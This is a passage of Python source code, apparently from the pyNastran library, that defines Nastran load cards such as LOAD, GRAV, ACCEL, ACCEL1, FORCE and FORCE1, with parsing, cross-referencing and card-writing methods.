'ACCEL1']\n load_scale = self.scale # global\n for (loads_pack, i_scale) in zip(self.load_ids, self.scale_factors):\n scale = i_scale * load_scale # actual scale = global * local\n if isinstance(loads_pack, integer_types):\n raise RuntimeError('the loads have not been cross-referenced')\n if scale == 0.0 and filter_zero_scale_factors:\n continue\n\n for load in loads_pack:\n if load.type in simple_loads:\n loads.append(load)\n scale_factors.append(scale) # local\n elif isinstance(load, LOAD):\n if not resolve_load_card:\n msg = (\n 'A LOAD card cannot reference another LOAD card\\n'\n 'current:\\n%s\\n'\n 'new:\\n%s' % (str(self), str(load))\n )\n raise RuntimeError(msg)\n load_data = load.get_reduced_loads(\n resolve_load_card=True,\n filter_zero_scale_factors=filter_zero_scale_factors)\n (reduced_scale_factors, reduced_loads) = load_data\n\n loads += reduced_loads\n scale_factors += [scale * j_scale\n for j_scale in reduced_scale_factors]\n else:\n msg = ('%s is not supported in the get_reduced_loads method'\n % load.__class__.__name__)\n raise NotImplementedError(msg)\n return (scale_factors, loads)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n load_ids2 = []\n msg = ', which is required by LOAD=%s' % (self.sid)\n for load_id in self.load_ids:\n if load_id == self.sid:\n msg = 'Type=%s sid=%s load_id=%s creates a recursion error' % (\n self.type, self.sid, load_id)\n raise RuntimeError(msg)\n load_id2 = model.Load(load_id, consider_load_combinations=True, msg=msg)\n assert isinstance(load_id2, list), load_id2\n load_ids2.append(load_id2)\n self.load_ids_ref = load_ids2\n\n def safe_cross_reference(self, model, xref_errors, debug=True):\n load_ids2 = []\n msg = ', which is required by LOAD=%s' % (self.sid)\n for load_id in self.load_ids:\n try:\n load_id2 = model.Load(load_id, consider_load_combinations=True, msg=msg)\n except KeyError:\n if debug:\n msg = 'Could not find load_id=%i, which is required by %s=%s' % (\n load_id, self.type, self.sid)\n print(msg)\n continue\n load_ids2.append(load_id2)\n self.load_ids_ref = load_ids2\n
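# Continuing the sketch above: after model.cross_reference(), the combination
# can be consumed as flat (scale, load) pairs; nested scale factors are
# multiplied through. Where the LOAD card lives (model.loads vs
# model.load_combinations) depends on the pyNastran version; the newer layout
# is assumed here:
#
# model.cross_reference()
# load_combo = model.load_combinations[101][0]
# scale_factors, loads = load_combo.get_reduced_loads()
# for scale, load in zip(scale_factors, loads):
#     print(scale, load.type)   # 1.0 FORCE, then 0.5 MOMENT for the ids above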
\n def raw_fields(self):\n list_fields = ['LOAD', self.sid, self.scale]\n load_ids = self.get_load_ids()\n for (scale_factor, load_id) in zip(self.scale_factors, load_ids):\n list_fields += [scale_factor, self.LoadID(load_id)]\n if len(load_ids) != len(self.scale_factors):\n msg = 'nload_ids=%s nscale_factors=%s are not the same\n' % (\n len(load_ids), len(self.scale_factors))\n msg += 'load_ids=%s\n' % (load_ids)\n msg += 'scale_factors=%s\n' % (self.scale_factors)\n msg += print_card_8(list_fields)\n raise IndexError(msg)\n return list_fields\n\n def repr_fields(self):\n return self.raw_fields()\n\n def write_card(self, size=8, is_double=False):\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n else:\n return self.comment + print_card_16(card)\n\n def uncross_reference(self):\n self.load_ids = self.get_load_ids()\n self.load_ids_ref = None\n\n\nclass GRAV(BaseCard):\n \"\"\"\n Defines acceleration vectors for gravity or other acceleration loading.\n\n +------+-----+-----+------+-----+-----+------+-----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |\n +======+=====+=====+======+=====+=====+======+=====+\n | GRAV | SID | CID | A | N1 | N2 | N3 | MB |\n +------+-----+-----+------+-----+-----+------+-----+\n | GRAV | 1 | 3 | 32.2 | 0.0 | 0.0 | -1.0 | |\n +------+-----+-----+------+-----+-----+------+-----+\n \"\"\"\n type = 'GRAV'\n\n def __init__(self, sid, scale, N, cid=0, mb=0, comment=''):\n \"\"\"\n Creates a GRAV card\n\n Parameters\n ----------\n sid : int\n load id\n scale : float\n scale factor for load\n N : (3, ) float ndarray\n the acceleration vector in the cid frame\n cid : int; default=0\n the coordinate system for the load\n mb : int; default=0\n ???\n comment : str; default=''\n a comment for the card\n \"\"\"\n if comment:\n self.comment = comment\n\n #: Set identification number\n self.sid = sid\n\n #: Coordinate system identification number.\n self.cid = cid\n\n #: scale factor\n self.scale = scale\n\n #: Acceleration vector components measured in coordinate system CID\n self.N = np.asarray(N)\n\n #: Indicates whether the CID coordinate system is defined in the\n #: main Bulk Data Section (MB = -1) or the partitioned superelement\n #: Bulk Data Section (MB = 0). Coordinate systems referenced in the\n #: main Bulk Data Section are considered stationary with respect to\n #: the assembly basic coordinate system. 
See Remark 10.\n #: (Integer; Default = 0)\n self.mb = mb\n self.cid_ref = None\n\n assert not allclose(max(abs(self.N)), 0.), ('GRAV N is a zero vector, '\n 'N=%s' % str(self.N))\n\n def validate(self):\n if not isinstance(self.scale, float):\n msg = 'scale=%s type=%s' % (self.scale, type(self.scale))\n raise TypeError(msg)\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a GRAV card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n cid = integer_or_blank(card, 2, 'cid', 0)\n scale = double(card, 3, 'scale')\n N = array([double_or_blank(card, 4, 'N1', 0.0),\n double_or_blank(card, 5, 'N2', 0.0),\n double_or_blank(card, 6, 'N3', 0.0)])\n mb = integer_or_blank(card, 7, 'mb', 0)\n assert len(card) <= 8, 'len(GRAV card) = %i\\ncard=%s' % (len(card), card)\n return GRAV(sid, scale, N, cid=cid, mb=mb, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a GRAV card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = data[0]\n cid = data[1]\n unused_a = data[2]\n N = array(data[3:6])\n mb = data[6]\n scale = 1.\n assert len(data) == 7\n return GRAV(sid, scale, N, cid=cid, mb=mb, comment=comment)\n\n def get_loads(self):\n return [self]\n\n #def transform_load(self):\n #g = self.GravityVector()\n #g2 = self.cid_ref.transform_node_to_global(g)\n #return g2\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by GRAV sid=%s' % self.sid\n self.cid_ref = model.Coord(self.cid, msg=msg)\n\n def safe_cross_reference(self, model, xref_errors, debug=True):\n # msg = \"Couldn't find CORDx=%s which is required by GRAV sid=%s\" % (self.cid, self.sid)\n msg = ', which is required by GRAV sid=%s' % self.sid\n self.cid_ref = model.safe_coord(self.cid, self.sid, xref_errors, msg=msg)\n\n def uncross_reference(self):\n self.cid = self.Cid()\n self.cid_ref = None\n\n def Cid(self):\n if self.cid_ref is not None:\n return self.cid_ref.cid\n return self.cid\n\n def GravityVector(self):\n \"\"\"returns the gravity vector in absolute coordinates\"\"\"\n if self.Cid() == 0:\n return self.N\n ## TODO: shouldn't be scaled by the ???\n p = self.cid_ref.transform_vector_to_global(self.N)\n return self.scale * p\n\n def raw_fields(self):\n N = list(self.N)\n list_fields = ['GRAV', self.sid, self.Cid(), self.scale] + N + [self.mb]\n return list_fields\n\n def repr_fields(self):\n N = []\n for n in self.N:\n N.append(set_blank_if_default(n, 0.0))\n\n mb = set_blank_if_default(self.mb, 0)\n list_fields = ['GRAV', self.sid, self.Cid(), self.scale] + N + [mb]\n return list_fields\n\n def write_card(self, size=8, is_double=False):\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n return self.comment + print_card_16(card)\n\n\nclass ACCEL(BaseCard):\n \"\"\"\n Acceleration Load\n\n Defines static acceleration loads, which may vary over a region of\n the structural model. 
The load variation is based upon the tabular\n input defined on this Bulk Data entry.\n\n +-------+------+------+--------+------+-----+-----+--------+-----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |\n +=======+======+======+========+======+=====+=====+========+=====+\n | ACCEL | SID | CID | N1 | N2 | N3 | DIR | | |\n +-------+------+------+--------+------+-----+-----+--------+-----+\n | | LOC1 | VAL1 | LOC2 | VAL2 | Continues in Groups of 2 |\n +-------+------+------+--------+------+--------------------------+\n | ACCEL | 100 | 2 | 0.0 | 1.0 | 2.0 | X | | |\n +-------+------+------+--------+------+-----+-----+--------+-----+\n | | 1.0 | 1.1 | 2.0 | 2.1 | 3.0 | 3.1 | 4.0 | 4.1 |\n +-------+------+------+--------+------+-----+-----+--------+-----+\n \"\"\"\n type = 'ACCEL'\n\n def __init__(self, sid, N, direction, locs, vals, cid=0, comment=''):\n \"\"\"\n Creates an ACCEL card\n\n Parameters\n ----------\n sid : int\n load id\n N : (3, ) float ndarray\n the acceleration vector in the cid frame\n direction : str\n Component direction of acceleration variation\n {X, Y, Z}\n locs : List[float]\n Location along direction DIR in coordinate system CID for\n specification of a load scale factor.\n vals : List[float]\n The load scale factor associated with location LOCi\n cid : int; default=0\n the coordinate system for the load\n comment : str; default=''\n a comment for the card\n \"\"\"\n if comment:\n self.comment = comment\n #: Load set identification number (Integer>0)\n self.sid = sid\n #: Coordinate system identification number. (Integer>0: Default=0)\n self.cid = cid\n\n #: Components of the acceleration vector measured in coordinate system\n #: CID. (Real; at least one Ni != 0)\n self.N = np.asarray(N, dtype='float64')\n\n #: Component direction of acceleration variation. 
(Character; one of X,Y or Z)\n self.direction = direction\n self.locs = array(locs, dtype='float64')\n self.vals = array(vals, dtype='float64')\n self.cid_ref = None\n\n def validate(self):\n assert max(abs(self.N)) > 0.\n assert self.direction in ['X', 'Y', 'Z'], 'dir=%r' % self.direction\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds an ACCEL card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n cid = integer_or_blank(card, 2, 'cid', 0)\n N = [double_or_blank(card, 3, 'N1', 0.0),\n double_or_blank(card, 4, 'N2', 0.0),\n double_or_blank(card, 5, 'N3', 0.0)]\n direction = string(card, 6, 'dir')\n\n i = 9\n locs = []\n vals = []\n j = 0\n nfields = len(card)\n while i < nfields:\n # LOCi/VALi come in pairs; read the VAL from the field after the LOC\n loc = double(card, i, 'loc%i' % j)\n val = double(card, i + 1, 'val%i' % j)\n #print('i=%s j=%s len=%s loc=%s val=%s' % (i, j, len(card), loc, val))\n locs.append(loc)\n vals.append(val)\n j += 1\n i += 2\n return ACCEL(sid, N, direction, locs, vals, cid=cid, comment=comment)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by ACCEL sid=%s' % self.sid\n self.cid_ref = model.Coord(self.cid, msg=msg)\n\n def uncross_reference(self):\n self.cid = self.Cid()\n self.cid_ref = None\n\n def safe_cross_reference(self, model, xref_errors, debug=True):\n msg = ', which is required by ACCEL sid=%s' % self.sid\n self.cid_ref = model.safe_coord(self.cid, self.sid, xref_errors, msg=msg)\n\n def Cid(self):\n if self.cid_ref is not None:\n return self.cid_ref.cid\n return self.cid\n\n def get_loads(self):\n return [self]\n\n def raw_fields(self):\n list_fields = [\n 'ACCEL', self.sid, self.Cid(),\n self.N[0], self.N[1], self.N[2], self.direction, None, None,\n ]\n for loc, val in zip(self.locs, self.vals):\n list_fields += [loc, val]\n return list_fields\n\n def write_card(self, size=8, is_double=False):\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n\nclass ACCEL1(BaseCard):\n \"\"\"\n Acceleration Load\n\n Defines static acceleration loads at individual GRID points.\n\n +--------+---------+---------+-----+----+----+----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 |\n +========+=========+=========+=====+====+====+====+\n | ACCEL1 | SID | CID | A | N1 | N2 | N3 |\n +--------+---------+---------+-----+----+----+----+\n | | GRIDID1 | GRIDID2 | etc | | | |\n +--------+---------+---------+-----+----+----+----+\n \"\"\"\n type = 'ACCEL1'\n\n def __init__(self, sid, scale, N, nodes, cid=0, comment=''):\n \"\"\"\n Creates an ACCEL1 card\n\n Parameters\n ----------\n sid : int\n load id\n scale : float\n scale factor for load\n N : (3, ) float ndarray\n the acceleration vector in the cid frame\n nodes : List[int]\n the nodes to apply acceleration to\n cid : int; default=0\n the coordinate system for the load\n comment : str; default=''\n a comment for the card\n \"\"\"\n if comment:\n self.comment = comment\n #: Load set identification number (Integer>0)\n self.sid = sid\n\n #: Coordinate system identification number. 
(Integer>0: Default=0)\n self.cid = cid\n\n #: Acceleration vector scale factor. (Real)\n self.scale = scale\n\n #: Components of the acceleration vector measured in coordinate system\n #: CID. (Real; at least one Ni != 0)\n self.N = np.asarray(N)\n\n #: nodes to apply the acceleration to\n self.nodes = expand_thru_by(nodes)\n\n assert max(abs(self.N)) > 0.\n self.nodes_ref = None\n self.cid_ref = None\n\n def validate(self):\n assert len(self.N) == 3, 'N=%r' % self.N\n assert isinstance(self.cid, integer_types), 'cid=%r' % self.cid\n assert isinstance(self.scale, float_types), 'scale=%r' % self.scale\n assert isinstance(self.nodes, list), 'nodes=%r' % self.nodes\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a ACCEL1 card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n cid = integer_or_blank(card, 2, 'cid', 0)\n scale = double(card, 3, 'scale')\n N = [double_or_blank(card, 4, 'N1', 0.0),\n double_or_blank(card, 5, 'N2', 0.0),\n double_or_blank(card, 6, 'N3', 0.0)]\n\n nodes = fields(integer_or_string, card, 'node', i=9, j=len(card))\n return ACCEL1(sid, scale, N, nodes, cid=cid, comment=comment)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by ACCEL1 sid=%s' % self.sid\n self.cid_ref = model.Coord(self.cid, msg=msg)\n self.nodes_ref = model.EmptyNodes(self.node_ids, msg=msg)\n\n def safe_cross_reference(self, model, xref_errors):\n msg = ', which is required by ACCEL1 sid=%s' % self.sid\n self.cid_ref = model.safe_coord(self.cid, self.sid, xref_errors, msg=msg)\n self.nodes_ref = model.EmptyNodes(self.node_ids, msg=msg)\n\n def uncross_reference(self):\n self.cid = self.Cid()\n self.nodes = self.node_ids\n self.nodes_ref = None\n self.cid_ref = None\n\n def Cid(self):\n if self.cid_ref is not None:\n return self.cid_ref.cid\n return self.cid\n\n @property\n def node_ids(self):\n #msg = ', which is required by ACCEL1 sid=%s' % self.sid\n #_node_ids(self.nodes, allow_empty_nodes=True, msg=msg)\n return self._node_ids(nodes=self.nodes_ref)\n\n def _node_ids(self, nodes=None): # this function comes from BaseCard.py\n \"\"\"returns node_ids for repr functions\"\"\"\n if not nodes:\n nodes = self.nodes\n if isinstance(nodes[0], integer_types):\n node_ids = [node for node in nodes]\n else:\n node_ids = [node.nid for node in nodes]\n assert 0 not in node_ids, 'node_ids = %s' % (node_ids)\n return node_ids\n\n def get_loads(self):\n return [self]\n\n def raw_fields(self):\n list_fields = [\n 'ACCEL1', self.sid, self.Cid(), self.scale,\n self.N[0], self.N[1], self.N[2], None, None\n ] + collapse_thru_by(self.node_ids)\n return list_fields\n\n def write_card(self, size=8, is_double=False):\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n\n#class Force(Load):\n #\"\"\"Generic class for all Forces\"\"\"\n #type = 'Force'\n\n #def __init__(self):\n #Load.__init__(self)\n\n #def transform_load(self):\n #xyz = self.cid_ref.transform_node_to_global(self.xyz)\n #if self.mag > 0.:\n #return (True, self.node, self.mag * xyz) # load\n #return (False, self.node, xyz) # enforced displacement\n\n #def get_loads(self):\n #return 
[self]\n\n #def F(self):\n #return self.xyz * self.mag\n\n #def get_reduced_loads(self, resolve_load_card=False, filter_zero_scale_factors=False):\n #scale_factors = [1.]\n #loads = self.F()\n #return(scale_factors, loads)\n\n #def write_card(self, size=8, is_double=False):\n #card = self.raw_fields()\n #if size == 8:\n #return self.comment + print_card_8(card)\n #if is_double:\n #return self.comment + print_card_double(card)\n #return self.comment + print_card_16(card)\n\n\n#class Moment(Load):\n #\"\"\"Generic class for all Moments\"\"\"\n #type = 'Moment'\n\n #def __init__(self):\n #Load.__init__(self)\n\n #def transform_load(self):\n ##print(\"self.xyz = \",self.xyz)\n #xyz = self.cid_ref.transform_node_to_global(self.xyz)\n #if self.mag > 0.:\n ##print(\"mag=%s xyz=%s\" % (self.mag, xyz))\n #return (True, self.node, self.mag * xyz) # load\n #return (False, self.node, xyz) # enforced displacement\n\n #def get_loads(self):\n #return [self]\n\n #def get_reduced_loads(self, resolve_load_card=False, filter_zero_scale_factors=False):\n #scale_factors = [1.]\n #loads = {\n #self.node: self.M()\n #}\n #return(scale_factors, loads)\n\n #def write_card(self, size=8, is_double=False):\n #card = self.raw_fields()\n #if size == 8:\n #return self.comment + print_card_8(card)\n #if is_double:\n #return self.comment + print_card_double(card)\n #return self.comment + print_card_16(card)\n\n\nclass Load0(BaseCard):\n \"\"\"common class for FORCE, MOMENT\"\"\"\n def __init__(self, sid, node, mag, xyz, cid=0, comment=''):\n \"\"\"\n Creates a FORCE/MOMENT card\n\n Parameters\n ----------\n sid : int\n load id\n node : int\n the node to apply the load to\n mag : float\n the load's magnitude\n xyz : (3, ) float ndarray\n the load direction in the cid frame\n cid : int; default=0\n the coordinate system for the load\n comment : str; default=''\n a comment for the card\n \"\"\"\n BaseCard.__init__(self)\n if comment:\n self.comment = comment\n self.sid = sid\n self.node = node\n self.cid = cid\n self.mag = mag\n self.xyz = np.asarray(xyz, dtype='float64')\n assert self.xyz.size == 3, self.xyz.shape\n assert isinstance(self.cid, int), self.cid\n self.node_ref = None\n self.cid_ref = None\n\n def validate(self):\n assert isinstance(self.cid, int), self.cid\n assert isinstance(self.mag, float), self.mag\n assert self.xyz.size == 3, self.xyz.shape\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a FORCE/MOMENT card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n node = integer(card, 2, 'node')\n cid = integer_or_blank(card, 3, 'cid', 0)\n mag = double(card, 4, 'mag')\n xyz = array([double_or_blank(card, 5, 'X1', 0.0),\n double_or_blank(card, 6, 'X2', 0.0),\n double_or_blank(card, 7, 'X3', 0.0)])\n assert len(card) <= 8, 'len(%s card) = %i\\ncard=%s' % (cls.type, len(card), card)\n return cls(sid, node, mag, xyz, cid=cid, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a FORCE/MOMENT card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = data[0]\n node = data[1]\n cid = data[2]\n mag = data[3]\n xyz = array(data[4:7])\n return cls(sid, node, mag, xyz, cid=cid, comment=comment)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted 
directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by %s sid=%s' % (self.type, self.sid)\n self.node_ref = model.Node(self.node, msg=msg)\n self.cid_ref = model.Coord(self.cid, msg=msg)\n\n def safe_cross_reference(self, model, xref_errors, debug=True):\n msg = ', which is required by %s sid=%s' % (self.type, self.sid)\n # try:\n self.node_ref = model.Node(self.node, msg=msg)\n self.cid_ref = model.safe_coord(self.cid, self.sid, xref_errors, msg=msg)\n\n def uncross_reference(self):\n self.cid = self.Cid()\n self.cid_ref = None\n\n def get_loads(self):\n return [self]\n\n @property\n def node_id(self):\n if self.node_ref is not None:\n return self.node_ref.nid\n return self.node\n\n def Cid(self):\n if self.cid_ref is not None:\n return self.cid_ref.cid\n return self.cid\n\n @property\n def scaled_vector(self):\n return self.xyz * self.mag\n\n def transform_load(self):\n xyz = self.cid_ref.transform_node_to_global(self.xyz)\n if self.mag > 0.:\n return (True, self.node, self.mag * xyz) # load\n return (False, self.node, xyz) # enforced displacement\n\n def raw_fields(self):\n list_fields = [self.type, self.sid, self.node_id, self.Cid(),\n self.mag] + list(self.xyz)\n return list_fields\n\n def repr_fields(self):\n cid = set_blank_if_default(self.Cid(), 0)\n list_fields = [self.type, self.sid, self.node_id, cid,\n self.mag] + list(self.xyz)\n return list_fields\n\n\nclass FORCE(Load0):\n \"\"\"\n Defines a static concentrated force at a grid point by specifying a\n scale factor and a vector that determines the direction.\n\n +-------+-----+------+-------+------+------+------+------+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |\n +=======+=====+======+=======+======+======+======+======+\n | FORCE | SID | NODE | CID | MAG | FX | FY | FZ |\n +-------+-----+------+-------+------+------+------+------+\n | FORCE | 3 | 1 | | 100. | 0. | 0. | 1. 
|\n +-------+-----+------+-------+------+------+------+------+\n \"\"\"\n type = 'FORCE'\n\n def __init__(self, sid, node, mag, xyz, cid=0, comment=''):\n \"\"\"\n Creates a FORCE card\n\n Parameters\n ----------\n sid : int\n load id\n node : int\n the node to apply the load to\n mag : float\n the load's magnitude\n xyz : (3, ) float ndarray\n the load direction in the cid frame\n cid : int; default=0\n the coordinate system for the load\n comment : str; default=''\n a comment for the card\n \"\"\"\n Load0.__init__(self, sid, node, mag, xyz, cid=cid, comment=comment)\n\n def write_card(self, size=8, is_double=False):\n if size == 8:\n cids = set_string8_blank_if_default(self.Cid(), 0)\n msg = 'FORCE %8i%8i%8s%8s%8s%8s%8s\\n' % (\n self.sid, self.node_id,\n cids, print_float_8(self.mag), print_float_8(self.xyz[0]),\n print_float_8(self.xyz[1]), print_float_8(self.xyz[2]))\n else:\n cids = set_string16_blank_if_default(self.Cid(), 0)\n if is_double:\n msg = ('FORCE* %16i%16i%16s%s\\n'\n '* %16s%16s%16s\\n') % (\n self.sid, self.node_id,\n cids, print_scientific_double(self.mag),\n print_scientific_double(self.xyz[0]),\n print_scientific_double(self.xyz[1]),\n print_scientific_double(self.xyz[2]))\n else:\n msg = ('FORCE* %16i%16i%16s%s\\n'\n '* %16s%16s%16s\\n') % (\n self.sid, self.node_id,\n cids, print_float_16(self.mag), print_float_16(self.xyz[0]),\n print_float_16(self.xyz[1]), print_float_16(self.xyz[2]))\n return self.comment + msg\n\n\nclass Load1(BaseCard):\n def __init__(self, sid, node, mag, g1, g2, comment=''):\n \"\"\"\n Creates a FORCE1/MOMENT1 card\n\n Parameters\n ----------\n sid : int\n load id\n node : int\n the node to apply the load to\n mag : float\n the load's magnitude\n n1 / n2 : int / int\n defines the load direction\n n = n2 - n1\n comment : str; default=''\n a comment for the card\n \"\"\"\n BaseCard.__init__(self)\n if comment:\n self.comment = comment\n self.sid = sid\n self.node = node\n self.mag = mag\n self.g1 = g1\n self.g2 = g2\n self.node_ref = None\n self.g1_ref = None\n self.g2_ref = None\n self.xyz = None\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a FORCE1/MOMENT1 card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n node = integer(card, 2, 'node')\n mag = double(card, 3, 'mag')\n g1 = integer(card, 4, 'g1')\n g2 = integer(card, 5, 'g2')\n assert len(card) == 6, 'len(%s card) = %i\\ncard=%s' % (cls.type, len(card), card)\n return cls(sid, node, mag, g1, g2, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a FORCE1/MOMENT1 card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = data[0]\n node = data[1]\n mag = data[2]\n g1 = data[3]\n g2 = data[4]\n return cls(sid, node, mag, g1, g2, comment=comment)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by %s sid=%s' % (self.type, self.sid)\n self.node_ref = model.Node(self.node, msg=msg)\n self.g1_ref = model.Node(self.g1, msg=msg)\n self.g2_ref = model.Node(self.g2, msg=msg)\n\n self.xyz = self.g2_ref.get_position() - self.g1_ref.get_position()\n normalize(self)\n\n def uncross_reference(self):\n self.node = 
self.node_id\n self.g1 = self.G1()\n self.g2 = self.G2()\n self.node_ref = None\n self.g1_ref = None\n self.g2_ref = None\n\n def safe_cross_reference(self, model, safe_coord, debug=True):\n \"\"\"\n .. todo:: cross reference and fix repr function\n \"\"\"\n return self.cross_reference(model)\n #msg = ', which is required by FORCE1 sid=%s' % self.sid\n #self.node_ref = model.Node(self.node, msg=msg)\n #self.g1_ref = model.Node(self.g1, msg=msg)\n #self.g2_ref = model.Node(self.g2, msg=msg)\n #self.xyz = self.g2.get_position() - self.g1.get_position()\n #normalize(self)\n\n def get_loads(self):\n return [self]\n\n @property\n def scaled_vector(self):\n return self.xyz * self.mag\n\n @property\n def node_ids(self):\n return [self.node_id, self.G1(), self.G2()]\n\n def G1(self):\n if self.g1_ref is not None:\n return self.g1_ref.nid\n return self.g1\n\n def G2(self):\n if self.g2_ref is not None:\n return self.g2_ref.nid\n return self.g2\n\n @property\n def node_id(self):\n if self.node_ref is not None:\n return self.node_ref.nid\n return self.node\n\n def raw_fields(self):\n list_fields = [self.type, self.sid, self.node_id, self.mag, self.G1(), self.G2()]\n return list_fields\n\n def repr_fields(self):\n return self.raw_fields()\n\n def write_card(self, size=8, is_double=False):\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n\nclass FORCE1(Load1):\n \"\"\"\n Defines a static concentrated force at a grid point by specification of a\n magnitude and two grid points that determine the direction.\n\n +--------+-----+----+-------+----+----+\n | 1 | 2 | 3 | 4 | 5 | 6 |\n +========+=====+====+=======+====+====+\n | FORCE1 | SID | G | F | G1 | G2 |\n +--------+-----+----+-------+----+----+\n | FORCE1 | 6 | 13 | -2.93 | 16 | 13 |\n +--------+-----+----+-------+----+----+\n \"\"\"\n type = 'FORCE1'\n\n def __init__(self, sid, node, mag, g1, g2, comment=''):\n \"\"\"\n Creates a FORCE1 card\n\n Parameters\n ----------\n sid : int\n load id\n node : int\n the node to apply the load to\n mag : float\n the load's magnitude\n n1 / n2 : int / int\n defines the load direction\n n = n2 - n1\n comment : str; default=''\n a comment for the card\n \"\"\"\n Load1.__init__(self, sid, node, mag, g1, g2, comment)\n #Force.__init__(self)\n\n\nclass Load2(BaseCard):\n \"\"\"common class for FORCE2, MOMENT2\"\"\"\n def __init__(self, sid, node, mag, g1, g2, g3, g4, comment=''):\n \"\"\"\n Creates a FORCE2/MOMENT2 card\n\n Parameters\n ----------\n sid : int\n load id\n node : int\n the node to apply the load to\n mag : float\n the load's magnitude\n g1 / g2 / g3 / g4 : int / int / int / int\n defines the load direction\n n = (g2 - g1) x (g4 - g3)\n comment : str; default=''\n a comment for the card\n \"\"\"\n if comment:\n self.comment = comment\n self.sid = sid\n self.node = node\n self.mag = mag\n self.g1 = g1\n self.g2 = g2\n self.g3 = g3\n self.g4 = g4\n self.node_ref = None\n self.g1_ref = None\n self.g2_ref = None\n self.g3_ref = None\n self.g4_ref = None\n self.xyz = None\n\n def validate(self):\n assert isinstance(self.sid, integer_types), str(self)\n assert self.g1 is not None, self.g1\n assert self.g2 is not None, self.g2\n assert self.g3 is not None, self.g3\n assert self.g1 != self.g2, 'g1=%s g2=%s' % (self.g1, self.g2)\n assert self.g3 != self.g4, 'g3=%s g4=%s' % (self.g3, self.g4)\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a 
FORCE2/MOMENT2 card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n node = integer(card, 2, 'node')\n mag = double(card, 3, 'mag')\n g1 = integer(card, 4, 'g1')\n g2 = integer(card, 5, 'g2')\n g3 = integer(card, 6, 'g3')\n g4 = integer_or_blank(card, 7, 'g4')\n assert len(card) in [7, 8], 'len(%s card) = %i\\ncard=%s' % (cls.type, len(card), card)\n return cls(sid, node, mag, g1, g2, g3, g4, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a FORCE2/MOMENT2 card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = data[0]\n node = data[1]\n mag = data[2]\n g1 = data[3]\n g2 = data[4]\n g3 = data[5]\n g4 = data[6]\n return cls(sid, node, mag, g1, g2, g3, g4, comment=comment)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by %s sid=%s' % (self.type, self.sid)\n self.node_ref = model.Node(self.node, msg=msg)\n self.g1_ref = model.Node(self.g1, msg=msg)\n self.g2_ref = 